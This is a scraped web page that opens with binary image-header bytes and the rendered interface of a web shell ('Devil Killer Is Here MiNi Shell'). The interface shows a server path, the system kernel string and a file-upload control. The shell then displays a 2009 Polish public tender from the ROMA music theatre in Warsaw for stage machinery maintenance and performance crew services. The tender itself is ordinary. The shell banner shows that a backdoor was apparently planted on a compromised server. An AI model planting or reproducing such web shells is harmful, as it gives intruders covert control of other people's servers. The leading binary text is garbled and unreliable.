JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090811/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090811/131119-N-2009.html

<p class="kh_header"><b>Warszawa: Kompleksowa konserwacja instalacji elektrycznej i urządzeń scenicznych oraz obsługa prób i spektakli w Teatrze Muzycznym ROMA.</b><br>
<b>Numer ogłoszenia: 131119 - 2009; data zamieszczenia: 11.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Teatr Muzyczny ROMA w Warszawie , ul. Nowogrodzka 49, 00-695 Warszawa, woj. mazowieckie, tel. 022 6287071, faks 022 6217233.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://teatrroma.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> Nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Samorządowa instytucja kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kompleksowa konserwacja instalacji elektrycznej i urządzeń scenicznych oraz obsługa prób i spektakli w Teatrze Muzycznym ROMA..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest kompleksowa konserwacja instalacji elektrycznej i urządzeń scenicznych oraz obsługa prób i spektakli w Teatrze Muzycznym ROMA. Przedmiotowe zamówienie składa się z dwóch części (zadań):
1.	Konserwacja instalacji elektrycznej i urządzeń scenicznych,
2.	Obsługa prób i spektakli.

Zadanie nr 1 
Konserwacja instalacji elektrycznej i urządzeń scenicznych.

Wykonawca będzie zobowiązany do świadczenia usług na rzecz Zamawiającego polegających na dokonywaniu nadzoru, przeglądów konserwacyjnych oraz  serwisu  w  nagłych  przypadkach  urządzeń scenicznych oraz elektrycznych w siedzibie Zamawiającego, ul. Nowogrodzkiej 49, 00-695 Warszawa. Wykonawca będzie zobowiązany w szczególności do wykonywania bieżącej konserwacji:

a)  sztankietów  o nośności Q 250 w ilości 35  sztuk oraz trzech sztankietów o nośności Q 700, polegającej na okresowej regulacji i korekcji lin nośnych oraz codziennym sprawdzaniu stanu m.in.:
     - lin nośnych,
     - kół linowych zawieszenia głównego i przeciwwagi,
     - kół zdawczych a szczególności trzpieni mocujących koła,
     - liny napędowej,
     - prowadników ślizgowych przeciwwagi,  
     - smaru w łożyskach i ewentualne uzupełnienie,
     - zderzaków przeciwwagi górnych i dolnych i ewentualna wymiana, 

b)  mostów - sztuk 4, polegającej na sprawdzeniu stanu oraz regulacji minimum raz na 14 dni;
     - napięć elektrycznych obwodów mostu,
     - skuteczności zacisków na aparatach i listwach zaciskowych,
     - luzownika,
     - szczęk hamulca i regulacja,
     - sprzęgła i tarczy hamulcowej,
     - lin nośnych,
     - kół linowych,
     - zespołu napędu wciągarki,
     - oleju we wciągarce,
     - smarowania łożysk wraz z uzupełnieniem smaru w smarowniczkach,
     - prowadników ślizgowych przeciwwagi,
     - wyłączników końcowych i krańcowych,
     - prawidłowego ustawienia zespołu napędowego,
     - działania pulpitu sterowniczego.

Wykonawca będzie ponadto zobowiązany do wykonywania pomiarów elektrycznych zgodnie z obowiązującymi normami i udokumentowanie tego stosownymi protokołami pomiarów nie rzadziej niż raz w roku.

c)  kurtyny tekstylnej polegającej na sprawdzeniu i regulacji;
     - działania pulpitu sterowniczego,
     - napięć elektrycznych obwodów kurtyny tekstylnej,
     - skuteczności zacisków na aparatach i listwach zaciskowych,
     - luzownika,
     - szczęk hamulca i regulacja,
     - sprzęgła i tarczy hamulcowej,
     - oleju w luzowniku, oraz ewentualne uzupełnienie lub wymiana,
     - lin nośnych,
     - kół linowych,
     - zespołu napędu wciągarki,
     - oleju we wciągarce,
     - prowadników ślizgowych kurtyny oraz przeciwwagi,
     - smarowania łożysk oraz ewentualnym uzupełnienie smaru w smarowniczkach,
     - wyłączników końcowych i krańcowych,
     - prawidłowego ustawienia zespołu napędowego,
     - prowadnic przeciwwagi i kurtyny oraz ewentualnym smarowaniu,
      
Wykonawca będzie ponadto zobowiązany do wykonywania pomiarów elektrycznych zgodnie z obowiązującymi normami i udokumentowanie tego stosownymi protokołami pomiarów nie rzadziej niż raz w roku.

d) kurtyny tekstylnej ppoż. polegającej na sprawdzeniu i regulacji;
     - wizualnego stanu kurtyny,
     - wyłączników krańcowych,
     - czujek dymowych sterujących pracą kurtyny - 2 sztuki - minimum raz na 30 dni,
     - kasety sterującej pracą kurtyny,
     - połączeń elektrycznych w centralce sterującej pracą kurtyny,
     - akumulatorów.

Wykonawca będzie ponadto zobowiązany do wykonywania pomiarów elektrycznych zgodnie z obowiązującymi normami i udokumentowanie tego stosownymi protokołami pomiarów nie rzadziej niż raz w roku.

e) kurtyny stalowej ppoż. polegającej na sprawdzeniu i regulacji:
     - działania pulpitu sterowniczego,
     - napięć elektrycznych obwodów kurtyny,
     - skuteczności zacisków na aparatach i listwach zaciskowych,
     - luzownika,
     - lin nośnych,
     - lin napędowych,
     - kół linowych,
     - zespołu napędu wciągarek,
     - stanu prowadników ślizgowych kurtyny oraz przeciwwagi,
     - smarowania łożysk oraz ewentualnym uzupełnienie smaru w smarowniczkach,
     - wyłączników końcowych i krańcowych,
     - prawidłowego ustawienia zespołu napędowego,
     - prowadnic przeciwwagi i kurtyny oraz ewentualnym smarowaniu,
     - poszycia kurtyny,
     - odbojów hydraulicznych przeciwwagi,

Wykonawca będzie ponadto zobowiązany do wykonywania pomiarów elektrycznych zgodnie z obowiązującymi normami i udokumentowanie tego stosownymi protokołami pomiarów nie rzadziej niż raz w roku.

f) trzech wyciągarek elektrycznych do podnoszenia dekoracji (scenografii ) polegającej na sprawdzeniu;
     - kaset sterowniczych i przycisków bezpieczeństwa STOP,
     - połączeń elektrycznych aparatów i listew połączeniowych,
     - lin nośnych, 
     - hamulca elektromagnetycznego wraz z  regulacją,
     - zużycia tarczy hamulcowej wraz z ewentualną wymianą.

Wykonawca będzie ponadto zobowiązany do wykonywania pomiarów elektrycznych zgodnie z obowiązującymi normami i udokumentowanie tego stosownymi protokołami pomiarów nie rzadziej niż raz w roku.

g) dwóch wyciągarek elektrycznych nad widownią polegającej na sprawdzeniu i regulacji;
     - kaset sterowniczych,
     - napięć elektrycznych obwodów wciągarek,
     - skuteczności zacisków na aparatach i listwach zaciskowych,
     - luzownika,
     - sprzęgła i tarczy hamulcowej,
     - lin nośnych,
     - kół linowych,
     - zespołu napędu wciągarek,
     - smarowania łożysk oraz ewentualnym uzupełnieniu smaru w smarowniczkach,
     - wyłączników końcowych i krańcowych,
     - prawidłowego ustawienia zespołu napędowego,
     - działania układacza lin.

Wykonawca będzie ponadto zobowiązany do wykonywania pomiarów elektrycznych zgodnie z obowiązującymi normami i udokumentowanie tego stosownymi protokołami pomiarów nie rzadziej niż raz w roku.

h)  ośmiu wciągników łańcuchowych polegającej na sprawdzeniu;
     - sposobu podwieszenia,
     - systemu podnoszenia i opuszczania ciężaru,
- smarowania mechanizmu podnoszenia i łańcucha oraz nasmarowaniu mechanizmu w razie potrzeb.
 
 i) stacji transformatorowej polegającej na;
     - wykonaniu przeglądów i sprawdzeniu stanu połączeń szyn, części N/N, 
     - co rocznym wykonywaniu pomiarów elektrycznych części N/N, 
- wykonywaniu przeglądów i pomiarów kontrolnych zgodnie z DTR transformatorów części Ś/N.
 
 j) instalacji wentylacji nawiewno - wyciągowej polegającej na sprawdzeniu ;
     - silników elektrycznych,
     - wentylatorów,
     - systemów przekładniowych (pasy klinowe, osłony),
     - nagrzewnic i chłodnic (nie dotyczy mediów zasilających),
     - przewodów wentylacyjnych,
     - komór kurzowych i filtrów,
     - kratek, czerpni i wyrzutni powietrza.

Wykonawca będzie ponadto zobowiązany do wykonywania pomiarów elektrycznych zgodnie z obowiązującymi normami i udokumentowanie tego stosownymi protokołami pomiarów nie rzadziej niż raz w roku.
 
 k) dźwigu szczelinowego do przewozu scenografii (dekoracji) polegającej na sprawdzeniu i regulacji; 
     - wartości napięć obwodów dźwigu,
     - skuteczności połączeń na zaciskach aparatów,
     - luzownika,
     - szczęk hamulca i regulacja,
     - lin nośnych,
     - kół linowych i sprzężenia ciernego,
     - sprzęgła i koła zamachowego,
     - zespołu napędu wciągarki,
     - stanu smaru i oleju w łożyskach i ewentualnym uzupełnieniu,
     - stanu prowadników ślizgowych lub tocznych kabiny i przeciwwagi,
     - aparatu chwytnego łącznie z kontaktami bezpieczeństwa,
     - wyłączników końcowych i krańcowych łącznie z ich regulacją,
     - działania kasety rewizyjnej,
     - zatrzymania kabiny na przystankach łącznie z regulacją elementów,
     - kontaktów bezpieczeństwa drzwi szybowych i rygli,
     - zderzaków pod kabiną i przeciwwagą,
     - prawidłowego ustawienia silnika napędowego,
     - wyposażenia kabiny (instrukcje obsługi, kaseta dyspozycji),
     - oświetlenia szybu,
     - kaset wezwań,
     - działania przycisku STOP,
     - czynności dachu kabiny i podszycia łącznie z usunięciem śmieci i innych przedmiotów związanych z eksploatacją dźwigu,
     - smarowania prowadnic, uzupełnieniu poziomu oleju we wciągarce,
     - dźwigu.

Wykonawca będzie ponadto zobowiązany do wykonywania pomiarów elektrycznych zgodnie z obowiązującymi normami i udokumentowanie tego stosownymi protokołami pomiarów nie rzadziej niż raz w roku. Wykonawca będzie uczestniczył w obligatoryjnym okresowym badaniu dźwigu przez UDT.

 l)  klap dymowych polegającej na sprawdzeniu;
      - kaset sterowniczych i przycisków bezpieczeństwa STOP,
      - połączeń elektrycznych aparatów i listew połączeniowych,
      - liny nośnej, 
      - hamulca elektromagnetycznego oraz jego regulacji,
      - zużycia tarczy hamulcowej i ewentualnej jej wymianie,
      - połączeń mechanizmu otwierania i zamykania klap,
      - przegubów mechanizmu zamykania i otwierania klap oraz wykonaniu smarowania.

Wykonawca będzie ponadto zobowiązany do wykonywania pomiarów elektrycznych zgodnie z obowiązującymi normami i udokumentowanie tego stosownymi protokołami pomiarów nie rzadziej niż raz w roku. 

m) wyciągarki łańcuchowej polegającej na sprawdzeniu;
      - kaset sterowniczych i przycisków bezpieczeństwa STOP,
      - stanu połączeń elektrycznych aparatów i listew połączeniowych,
      - łańcucha i jego smarowaniu, 
      - hamulców elektromagnetycznych (dwa hamulce), 
  
Wykonawca będzie ponadto zobowiązany do wykonywania pomiarów elektrycznych zgodnie z obowiązującymi normami i udokumentowanie tego stosownymi protokołami pomiarów nie rzadziej niż raz w roku. 

n) codziennej udokumentowanej kontroli zawiesi.

o) urządzenia służące do podwieszania elementów.

Kontrola powinna polegać na bieżącym sprawdzaniu urządzeń służących do podwieszania elementów dekoracyjnych, scenograficznych i aparatury na scenie, widowni, zasceniu zgodnie z Rozporządzeniem Ministra Kultury i Sztuki z dnia 2 września 1982 r. w sprawie bezpieczeństwa i higieny pracy w instytucjach artystycznych.

Przedmiot zamówienia obejmuje również wykonywanie konserwacji i nadzoru instalacji elektrycznej w budynku Teatru, polegającej w szczególności na:

     -  wykonywaniu przeglądów instalacji elektrycznej stałej zgodnie z odpowiednimi przepisami,
     -  bieżącym usuwaniu usterek wynikłych podczas eksploatacji instalacji,
     -  wykonywaniu bieżących  remontów instalacji elektrycznej stałej w zakresie wymiany okablowania i osprzętu (projekt i materiały zapewni Zamawiający),
     -  corocznym badaniu instalacji elektrycznej w zakresie pętli zwarcia i rezystancji izolacji instalacji stałej,
     -  codziennym przeglądzie wizualnym wszystkich rozdzielni na terenie Teatru,
     -  codziennym przeglądzie wizualnym urządzeń scenicznych,
     -  współpracy z firmami zewnętrznymi wykonującymi prace elektryczne na terenie Teatru,
     -  zapewnieniu dyżuru elektrycznego 8 - godzinnego w dni robocze (w godzinach 9.00 - 17.00),
     -  sprawdzeniu co 6 miesięcy instalacji oświetlenia awaryjnego zakończone spisaniem protokołu 
     -  wykonaniu co pół  roku pomiarów oraz po każdym remoncie elektrycznych urządzeń ruchomych (wiertarki, spawarki, toaletki w garderobach, odkurzacze i inne urządzenia elektryczne, komputerowe oraz AGD) i prowadzeniu stosownej dokumentacji.

Wykonawca będzie zobowiązany do wykonania zamówienia przy pomocy osób przedstawionych w ofercie. Każdorazowa zmiana osoby  będzie wymagała uzyskania zgody Zamawiającego na piśmie.

Rozliczenie będzie następowało co miesiąc.

Wykonawca zobowiązany jest do posiadania w okresie obowiązywania umowy ważnego ubezpieczenia od odpowiedzialności cywilnej za szkody wyrządzone przy wykonywaniu czynności objętych zamówieniem na kwotę nie mniejszą niż 100 000 zł.


Zadanie nr 2

Obsługa prób i spektakli.

Przedmiotem zamówienia jest obsługa spektakli i prób w Obiekcie Zamawiającego. Wykonawca będzie zobowiązany do zapewnienia obsługi urządzeń elektrycznych występujących w elementach dekoracji (scenografii) oraz wykonywania prac związanych z przebudową dekoracji (scenografii) z bieżącego repertuaru na dekorację nową  - premierową lub wznowieniową. Wykonawca będzie zobowiązany do zapewnienia obsługi na każde wskazane przedstawienie lub próbę. Podczas spektakli i prób pracownicy Wykonawcy będą obsługiwać dekoracje i urządzenia sceniczne w celu zapewnienia ich rozmieszczenia zgodnie ze scenariuszem przedstawienia. 
Wykonawca zapewni kompleksową obsługę prób i spektakli według harmonogramu ustalonego przez Zamawiającego. Zamawiający przewiduję, iż do obsługi spektakli będzie potrzebne sześć osób. Zamawiający przedstawi z wyprzedzeniem tygodniowym grafik określający ilości osób oraz czas pracy na konkretny spektakl lub próbę.  
Zamawiający wymaga aby minimum trzy osoby przedstawione do pracy przez Wykonawcę posiadały uprawnienia SEP E do 1 KV oraz aby co najmniej  jedna osoba posiadała  przeszkolenie z obsługi dźwigu szczelinowego. 
Osoby wyznaczone go pracy przez Wykonawcę powinny posiadać znajomość urządzeń teatralnych, fachowego obchodzenia się tymi urządzeniami zgodnie z wytycznymi przepisów dotyczących BHP i ppoż. 
Zamawiający przewiduje, iż w ramach obsługi spektaklu każda z osób wyznaczonych przez Wykonawcę będzie świadczyć usługi związane z obsługą spektaklu przez 6 godzin.
Ilość osób niezbędnych do obsługi spektaklu i prób jak i zakres godzinowy ich pracy może ulegać zmianie w trakcie wykonywania przedmiotowego zamówienia.
Osoby wyznaczone do obsługi powinny dysponować aktualnymi badaniami lekarskimi potwierdzającymi zdolność do pracy, w tym zdolność do pracy na wysokościach. Osoby te powinny mieć świadectwo szkoleń bhp - zgodnie z obowiązującymi przepisami.
Wykonawca będzie zobowiązany do wykonania zamówienia przy pomocy osób przedstawionych w ofercie. Każdorazowa zmiana osoby  będzie wymagała uzyskania zgody Zamawiającego na piśmie.
Zamawiający zapłaci Wykonawcy kwotę na podstawie rozliczenia miesięcznego, w którym zostanie ujęta liczba spektakli lub prób, które obsługiwał Wykonawca, liczba osób zaangażowana w poszczególny spektakl lub próbę, liczba godzi, w których były świadczone usługi na rzecz Zamawiającego oraz stawka roboczogodzinowa za każdą osobę świadczącą usługi na rzecz Zamawiającego. Rozliczenie nastąpi na podstawie rzeczywiście przepracowanej ilości godzin i zostanie potwierdzone zgodnie z raportem prowadzonym przez Zamawiającego,

Wykonawca zobowiązany jest do posiadania w okresie obowiązywania umowy ważnego ubezpieczenia od odpowiedzialności cywilnej za szkody wyrządzone przy wykonywaniu czynności objętych zamówieniem na kwotę nie mniejszą niż 100 000 zł..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 50.00.00.00-5, 50.53.00.00-9, 50.71.10.00-2, 51.50.00.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Zgodnie z art. 22 Ustawy, o udzielenie Zamówienia mogą ubiegać się Wykonawcy, którzy:
1)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
3)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
4)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia

Ocena spełnienia warunków udziału w postępowaniu nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów i oświadczeń.

Ocena spełnienia wyżej określonych warunków odbędzie się wg formuły: spełnia - nie spełnia. Nie spełnienie chociażby jednego warunku udziału w postępowaniu skutkować będzie wykluczeniem Wykonawcy z postępowania.

Dokumenty powinny zostać dostarczone w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę. Oświadczenia Wykonawcy składają wyłącznie w formie oryginału.

Wykonawcy składający ofertę na więcej niż jedną część zamówienia są uprawnieni do złożenia wymaganych dokumentów tylko jeden raz (jeden egzemplarz). Zamawiający zaznaczy, które z dokumentów potwierdzających spełnienie warunków udziału w postępowaniu dotyczą Zadania nr 1 lub/i Zadania nr 2.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. W celu potwierdzenia, że Wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych, Zamawiający żąda następujących dokumentów:

a. aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

Dotyczy Zadania nr 1 i Zadania nr 2.

b. aktualnych zaświadczeń właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.

Dotyczy Zadania nr 1 i Zadania nr 2.

c. aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

Dotyczy Zadania nr 1 i Zadania nr 2.

2. W celu potwierdzenia opisanego przez Zamawiającego warunku posiadania przez Wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, Zamawiający żąda:

a. wykazu osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności 

Wykonawca zobowiązany jest przedstawić sześć osób, którymi będzie dysponował. Minimum 3 osoby wskazane przez Wykonawcę powinny posiadać roczne doświadczenie w wykonywaniu prac na scenie teatrów. 

W przypadku gdy Wykonawca wskaże w wykazie, iż będzie dysponował osobami udostępnionymi przez inny podmiot, niezbędne jest przedstawienie pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia - zgodnie z § 1 ust. 2 pkt 5a Rozporządzenie Prezesa Rady Ministrów w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane

		Dotyczy Zadania nr 2

b. stwierdzających, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień:

Wykonawca powinien dysponować osobami posiadającymi:
- uprawnienia D (dozoru ) 
- uprawnienia SEP E ( eksploatacji ) w zakresie obsługi, konserwacji, remontów  urządzeń i instalacji elektrycznych.

Dotyczy Zadania nr 1

Wykonawca powinien dysponować osobami posiadającymi następujące uprawnienia:
- trzy osoby - uprawnienia SEP E minimum do 1 KV.

Dotyczy Zadania nr 2.

3. W celu potwierdzenia opisanego przez Zamawiającego warunku znajdowania się przez Wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, zamawiający żąda następujących dokumentów:
	
a. polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności.

Wykonawca powinien przedstawić dokument potwierdzający ubezpieczenie w ww. zakresie na kwotę nie mniejszą niż 100 000 zł.

Dotyczy Zadania nr 1 i Zadania nr 2.

4. W celu potwierdzenia spełnienia warunków udziału w postępowaniu opisanych w art. 22 ustawy Prawo zamówień publicznych, Zamawiający żąda:

a.  przedstawienia oświadczenia potwierdzającego spełnienie warunków udziału w postępowaniu zgodnie z art. 22 ustawy Prawo zamówień publicznych.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://teatrroma.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Teatr Muzyczny ROMA w Warszawie, ul. Nowogrodzka 49,  00-695 Warszawa - Sekretariat pokój nr 10. Sekretariat Teatru pracuje od poniedziałku do piątku w godzinach 9:00-17:00..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.08.2009 godzina 13:00, miejsce: Teatr Muzyczny ROMA w Warszawie, ul. Nowogrodzka 49,  00-695 Warszawa - Sekretariat pokój nr 10. Sekretariat Teatru pracuje od poniedziałku do piątku w godzinach 9:00-17:00..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Konserwacja instalacji elektrycznej i urządzeń scenicznych..</p>
